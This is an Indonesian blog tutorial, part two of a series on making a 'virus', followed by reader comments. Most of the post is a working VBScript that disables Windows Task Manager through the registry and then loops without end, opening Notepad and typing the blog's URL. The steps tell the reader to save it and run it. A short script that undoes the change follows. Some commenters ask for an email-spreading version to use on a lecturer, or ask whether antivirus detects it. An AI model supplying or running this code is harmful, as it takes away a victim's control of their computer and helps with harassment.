Belajar Cara membuat Virus (2)

Masih seputar cara membuat virus kelas teri. Peringatan saya sarankan anda tidak melanjutkan membaca artikel ini, jika anda tidak kuat iman untuk berbuat macem-macem menyalahgunakan teknologi untuk merusak membuat jengkel para pengguna komputer. Semua pilihan mo digunakan untuk apa teknologi pemrograman terserah anda, resiko dan akibat ditanggung sendiri.
Sebelum membaca artikel ini terlebih dahulu baca artikel pertama sebelumnya klik DISINI.

Kalau virus sebelumnya bisa dimatikan melalui Task Manager, sekarang bagaimana kalau Task Managernya dinonaktifkan/didisable oleh virus? nah lo. Berikut proses pembuatan virusnya sekaligus penanganannya.

Berikut cara mudah membuat virus ikuti langkah-langkahnya secara urut :

1. Copy code vbscript dibawah ini (diantara garis pembatas)

==========================================================

Set klikbebas = CreateObject("Wscript.shell")
klikbebas.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

WScript.Sleep 18000
WScript.Sleep 1000
do
Set klikbebas = WScript.CreateObject("WScript.Shell")
klikbebas.Run "notepad"
WScript.Sleep 100
klikbebas.AppActivate "Notepad"
WScript.Sleep 500
klikbebas.SendKeys "K"
WScript.Sleep 500
klikbebas.SendKeys "u"
WScript.Sleep 500
klikbebas.SendKeys "n"
WScript.Sleep 500
klikbebas.SendKeys "j"
WScript.Sleep 500
klikbebas.SendKeys "u"
WScript.Sleep 500
klikbebas.SendKeys "n"
WScript.Sleep 500
klikbebas.SendKeys "g"
WScript.Sleep 500
klikbebas.SendKeys "i"
WScript.Sleep 500
klikbebas.SendKeys " "
WScript.Sleep 500
klikbebas.SendKeys "k"
WScript.Sleep 500
klikbebas.SendKeys "l"
WScript.Sleep 500
klikbebas.SendKeys "i"
WScript.Sleep 500
klikbebas.SendKeys "k"
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "e"
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "a"
WScript.Sleep 500
klikbebas.SendKeys "s"
WScript.Sleep 500
klikbebas.SendKeys "."
WScript.Sleep 500
klikbebas.SendKeys "b"
WScript.Sleep 500
klikbebas.SendKeys "l"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "g"
WScript.Sleep 500
klikbebas.SendKeys "s"
WScript.Sleep 500
klikbebas.SendKeys "p"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "."
WScript.Sleep 500
klikbebas.SendKeys "c"
WScript.Sleep 500
klikbebas.SendKeys "o"
WScript.Sleep 500
klikbebas.SendKeys "m"
WScript.Sleep 500
wscript.sleep 5000
loop

==========================================================

2. Buka Notepad --> paste kan code nya di notepad --> simpan dengan extensi vbs (misal inivirus.vbs)

3. Mo mencoba virus buatan sendiri? tinggal klik aja deh 2x, dan nikmatilah hasilnya.


Nah lhooo trus gimana cara menghentikannya? dengan Task Manager Ctrl + Alt + Delete sudah tidak bisa.

Ok, ikutilah langkah-langkah mengaktifkan kembali Task Manager :

1. Copy code vbscript dibawah ini (diantara garis pembatas)

==========================================================

Set klikbebas = CreateObject("Wscript.shell")
klikbebas.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"

==========================================================

2. Buka Notepad --> paste kan code nya di notepad --> simpan dengan extensi vbs (misal ini antivirus.vbs)

3. Jalankan file vbs yang sudah dibuat tersebut, coba buka Task Manager dengan cara tekan Ctrl + Alt + Delete yang ada di keyboard tentunya.


Selesai dah cara membuat virus gadungan kelas teri. Seperti itulah virus dan antivirus dibuat, tapi ini contoh yang sederhana, dan sudah bisa bikin jengkel bagi yang tidak tau solusinya.

Lain kali bagaimana kalau mempelajari tentang virus yang aktif saat komputer dihidupkan? tunggu artikel berikutnya.

18 komentar:

@fadhel
wah kagak bakat lu bro. xii xiii

utk yg Pertamax...
thanks sob..
artikelnya sangat bermanfaat..
mohon kunjungan balik'a y sob..(*n_n*)


Salam ..:: Natan auto software ::..

Pentig ga penting tuh Sob...hahah

ajarin buat virus via email dong sob.. pengen ngasih pelajaran buat dosen yang sok it nih.. thx dtunggu jawabannya.. :)

virus yang ini gx bisa disebar lewat internet sob..????

waduh gan makasih bnyk ilmunya sampai-sampai saya sempet down waktu kejar-kejaran ngesave ame virus agan....
skali lagi makasih ilmunya
klo ada kasih tau lagi cara yng lainnya

Gan klo bolek tahu tolong jelasin satu persatu gan

Ditunggu di email: w_stya1@yahoo.com

wkwkwkwk mntap
kedeteksi ap gk ni gan sma antivirus

mantaap.. asli bikin kelabakan hahaha

makasih gan ilmunya....

gan cara kerja virus itu seperti apah ?

@fuad
cara kerja firus sebenarnya tidak beda dengan program" komp yg lain. bedanya klo virus bisa berjalan sendiri tanpa di jalankan.
klo pengen lebih jelas praktekkan aja artikelnya

thx gan, kren bwt pemula kya ane

wah keren sob . . Ane coba ya.

jago banget agan bikin virusnya.
bisa bikin virus yg bisa buat tetangga batuk pilek sama bersin-bersin gak gan?
:D

Posting Komentar

Mohon berkomentar sesuai dengan topik pembahasan. Mohon baca artikel dengan lebih teliti sebelum bertanya.
Komentar / pertanyaan tidak sesuai topik, basa-basi, tidak sopan, dll, akan kami hapus.